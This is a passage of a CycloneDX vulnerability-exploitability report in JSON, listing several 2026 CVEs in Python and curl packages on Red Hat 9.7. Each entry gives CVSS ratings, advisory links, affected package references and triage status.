"urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-6019", "ratings": [ { "source": { "name": "redhat" }, "score": 6.8, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], "cwes": [ 150 ], "description": "http.cookies.Morsel.js_output() returns an inline inside the generated script element. Mitigation base64-encodes the cookie value to disallow escaping using cookie value.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-6019" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-6019" }, { "url": "https://github.com/python/cpython/commit/3c59b8b53fc75c7f9578d16fb8201ceb43e8f76c" }, { "url": "https://github.com/python/cpython/commit/76b3923d688c0efc580658476c5f525ec8735104" }, { "url": "https://github.com/python/cpython/commit/f795e042043dfe26c42e1971d4502c1cdc4c65b8" }, { "url": "https://github.com/python/cpython/issues/90309" }, { "url": "https://github.com/python/cpython/pull/148848" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/IVNWGV2BBNC3RHQAFS22UP4DY56SAXX3/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6019" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-6019" } ], "published": "2026-04-22T20:16:42+00:00", "updated": "2026-04-29T16:16:28+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-6100", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 8.1, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "source": { "name": "rocky" }, "severity": "high" } ], "cwes": [ 416, 787 ], "description": "Use-after-free (UAF) was possible in the `lzma.LZMADecompressor`, `bz2.BZ2Decompressor`, and `gzip.GzipFile` when a memory allocation fails with a `MemoryError` and the decompression instance is re-used. This scenario can be triggered if the process is under memory pressure. The fix cleans up the dangling pointer in this specific error condition.\n\nThe vulnerability is only present if the program re-uses decompressor instances across multiple decompression calls even after a `MemoryError` is raised during decompression. Using the helper functions to one-shot decompress data such as `lzma.decompress()`, `bz2.decompress()`, `gzip.decompress()`, and `zlib.decompress()` are not affected as a new decompressor instance is used per call. If the decompressor instance is not re-used after an error condition, this usage is similarly not vulnerable.", "recommendation": "Upgrade python-unversioned-command to version 3.9.25-3.el9_7.3; Upgrade python3 to version 3.9.25-3.el9_7.3; Upgrade python3-libs to version 3.9.25-3.el9_7.3", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-6100" }, { "url": "http://www.openwall.com/lists/oss-security/2026/04/13/10" }, { "url": "https://access.redhat.com/errata/RHSA-2026:10949" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-6100" }, { "url": "https://bugzilla.redhat.com/2457932" }, { "url": "https://bugzilla.redhat.com/2458049" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100" }, { "url": "https://errata.almalinux.org/9/ALSA-2026-10949.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:10949" }, { "url": "https://github.com/python/cpython/commit/47128e64f98c3a20271138a98c2922bea2a3ee0e" }, { "url": "https://github.com/python/cpython/commit/6a5f79c8d7bbf22b083b240910c7a8781a59437d" }, { "url": "https://github.com/python/cpython/commit/8fc66aef6d7b3ae58f43f5c66f9366cc8cbbfcd2" }, { "url": "https://github.com/python/cpython/commit/c3cf71c3366fe49acb776a639405c0eea6169c20" }, { "url": "https://github.com/python/cpython/commit/e20c6c9667c99ecaab96e1a2b3767082841ffc8b" }, { "url": "https://github.com/python/cpython/issues/148395" }, { "url": "https://github.com/python/cpython/pull/148396" }, { "url": "https://linux.oracle.com/cve/CVE-2026-6100.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-11077.html" }, { "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/HTWB2Z6KT5QQX4RYEZAFININDHNOSIF3/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6100" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-6100" } ], "published": "2026-04-13T18:16:31+00:00", "updated": "2026-04-17T15:18:16+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.9.25-3.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "in_triage", "justification": "", "response": [], "detail": "This CVE is under investigation by Confluent." } }, { "id": "CVE-2026-6253", "ratings": [ { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "description": "A flaw was found in curl. When curl is configured to use distinct proxies for different URL schemes, a redirect from a URL using an authenticated proxy to one using an unauthenticated proxy can inadvertently expose the initial proxy's credentials. This improper credential management (CWE-522) may allow an attacker to gain unauthorized access or information by intercepting these disclosed credentials.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-6253" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-6253" }, { "url": "https://curl.se/docs/CVE-2026-6253.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6253" }, { "url": "https://ubuntu.com/security/notices/USN-8227-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-6253" } ], "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": 